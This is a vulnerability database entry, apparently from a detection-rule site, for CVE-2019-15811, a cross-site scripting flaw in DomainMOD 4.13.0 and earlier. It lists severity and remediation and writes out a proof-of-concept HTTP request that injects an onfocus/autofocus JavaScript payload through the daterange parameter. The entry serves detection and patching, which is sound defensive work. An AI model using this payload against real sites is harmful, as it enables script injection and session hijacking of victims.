🔙 목록으로 돌아가기

CVE-2019-15811: DomainMOD <=4.13.0 - Cross-Site Scripting

TitleDomainMOD <=4.13.0 - Cross-Site Scripting
Authorarafatansari
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.
RemediationUpgrade to the latest version of DomainMOD (>=4.13.1) to mitigate this vulnerability.
CVSS Score6.1
EPSS Score0.01196
CVE IDCVE-2019-15811
CWE IDCWE-79
Tags cve cve2019 domainmod xss authenticated edb vuln

🔍 Vulnerability Description

DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters.

🌐 HTTP Request

POST / HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1
Connection: close
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

new_username=r8Epvd&new_password=hetIIn
GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.8
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-15811.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-15811.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A